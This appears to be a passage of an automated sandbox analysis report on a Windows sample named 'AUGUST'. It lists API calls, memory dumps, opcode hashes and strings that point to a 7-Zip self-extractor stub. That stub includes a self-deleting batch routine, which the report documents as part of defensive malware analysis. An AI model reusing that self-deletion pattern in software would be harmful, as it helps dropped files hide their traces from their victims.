                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                          • Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
                          • Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                          • Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                          • Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
                          • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                          • Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                          • Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
                          • Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                          • Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50
                          APIs
                          • GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
                          • WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
                          • CloseHandle.KERNEL32(004177C4), ref: 00404C40
                          • SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
                          • ??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
                          • ??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                          • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                          • API String ID: 3007203151-3467708659
                          • Opcode ID: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                          • Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
                          • Opcode Fuzzy Hash: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                          • Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58
                          APIs
                          • lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF
                            • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                            • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                            • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                            • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                            • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                            • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                            • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                            • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                            • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                            • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                            • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                            • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                            • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                          • _wtol.MSVCRT ref: 004047DC
                          • _wtol.MSVCRT ref: 004047F8
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                          • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
                          • API String ID: 2725485552-3187639848
                          • Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                          • Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
                          • Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                          • Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D
                          APIs
                          • GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
                          • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
                          • GetWindowLongW.USER32(?,000000F0), ref: 00402DF3
                            • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                            • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                            • Part of subcall function 00401A85: CharUpperW.USER32(?,7622E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                            • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
                          • GetParent.USER32(?), ref: 00402E2E
                          • LoadLibraryA.KERNEL32(riched20), ref: 00402E42
                          • GetMenu.USER32(?), ref: 00402E55
                          • SetThreadLocale.KERNEL32(00000419), ref: 00402E62
                          • CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
                          • DestroyWindow.USER32(?), ref: 00402EA3
                          • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
                          • GetSysColor.USER32(0000000F), ref: 00402EBC
                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
                          • SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                          • String ID: RichEdit20W$STATIC$riched20${\rtf
                          • API String ID: 1731037045-2281146334
                          • Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                          • Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
                          • Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                          • Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68
                          APIs
                          • GetWindowDC.USER32(00000000), ref: 00401CD4
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                          • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                          • GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                          • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                          • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                          • CreateCompatibleDC.GDI32(?), ref: 00401D4B
                          • CreateCompatibleDC.GDI32(?), ref: 00401D52
                          • SelectObject.GDI32(00000000,?), ref: 00401D60
                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                          • SelectObject.GDI32(00000000,00000000), ref: 00401D76
                          • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                          • GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                          • SelectObject.GDI32(00000000,?), ref: 00401DB3
                          • SelectObject.GDI32(00000000,?), ref: 00401DB9
                          • DeleteDC.GDI32(00000000), ref: 00401DC2
                          • DeleteDC.GDI32(00000000), ref: 00401DC5
                          • ReleaseDC.USER32(00000000,?), ref: 00401DCC
                          • ReleaseDC.USER32(00000000,?), ref: 00401DDB
                          • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                          • String ID:
                          • API String ID: 3462224810-0
                          • Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                          • Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
                          • Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                          • Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64
                          APIs
                          • GetClassNameA.USER32(?,?,00000040), ref: 00401E05
                          • lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
                          • GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
                          • GetMenu.USER32(?), ref: 00401E44
                            • Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                            • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                            • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                            • Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                            • Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                            • Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41
                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
                          • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
                          • CoInitialize.OLE32(00000000), ref: 00401E8C
                          • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
                          • GlobalFree.KERNEL32(00000000), ref: 00401ECD
                            • Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
                            • Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                            • Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                            • Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                            • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                            • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                            • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
                            • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
                            • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
                            • Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                            • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
                            • Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                            • Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                            • Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                            • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
                            • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
                            • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
                            • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
                            • Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC
                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
                          • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
                          • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
                          • GlobalFree.KERNEL32(00000000), ref: 00401F3A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                          • String ID: IMAGES$STATIC
                          • API String ID: 4202116410-1168396491
                          • Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                          • Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
                          • Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                          • Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68
                          APIs
                            • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                            • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                          • GetDlgItem.USER32(?,000004B8), ref: 0040816A
                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
                          • GetDlgItem.USER32(?,000004B5), ref: 004081C0
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
                          • GetDlgItem.USER32(?,000004B5), ref: 004081D5
                          • SetWindowLongW.USER32(00000000), ref: 004081D8
                          • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
                          • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
                          • GetDlgItem.USER32(?,000004B4), ref: 0040821A
                          • SetFocus.USER32(00000000), ref: 0040821D
                          • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
                          • CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
                          • GetDlgItem.USER32(?,00000002), ref: 00408294
                          • IsWindow.USER32(00000000), ref: 00408297
                          • GetDlgItem.USER32(?,00000002), ref: 004082A7
                          • EnableWindow.USER32(00000000), ref: 004082AA
                          • GetDlgItem.USER32(?,000004B5), ref: 004082BE
                          • ShowWindow.USER32(00000000), ref: 004082C1
                            • Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142
                            • Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                            • Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                            • Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                            • Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
                            • Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                            • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                            • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                            • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                            • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                            • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                            • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                            • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                            • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                            • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                            • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                          • String ID:
                          • API String ID: 855516470-0
                          • Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                          • Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
                          • Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                          • Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C
                          APIs
                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
                          • strncmp.MSVCRT ref: 004031F1
                          • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
                          • lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
                          • ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: ??3@$lstrcmpstrncmp
                          • String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
                          • API String ID: 2881732429-172299233
                          • Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                          • Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
                          • Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                          • Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59
                          APIs
                          • GetDlgItem.USER32(?,000004B3), ref: 00406A69
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
                          • GetDlgItem.USER32(?,000004B4), ref: 00406AA5
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
                          • GetSystemMetrics.USER32(00000010), ref: 00406B0B
                          • GetSystemMetrics.USER32(00000011), ref: 00406B11
                          • GetSystemMetrics.USER32(00000008), ref: 00406B18
                          • GetSystemMetrics.USER32(00000007), ref: 00406B1F
                          • GetParent.USER32(?), ref: 00406B43
                          • GetClientRect.USER32(00000000,?), ref: 00406B55
                          • ClientToScreen.USER32(?,?), ref: 00406B68
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
                          • GetClientRect.USER32(?,?), ref: 00406C55
                          • ClientToScreen.USER32(?,?), ref: 00406B71
                            • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                          • GetSystemMetrics.USER32(00000008), ref: 00406CD6
                          • GetSystemMetrics.USER32(00000007), ref: 00406CDD
                            • Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
                            • Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2748025876.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000E.00000002.2748010350.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748044403.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748059998.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                          • Associated: 0000000E.00000002.2748074653.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_AUGUST.jbxd
                          Similarity
                          • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                          • String ID:
                          • API String ID: 747815384-0
                          • Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                          • Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
                          • Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                          • Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                          • LoadIconW.USER32(00000000), ref: 00407D33
                          • GetSystemMetrics.USER32(00000032), ref: 00407D43
                          • GetSystemMetrics.USER32(00000031), ref: 00407D48
                          • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                          • LoadImageW.USER32(00000000), ref: 00407D54
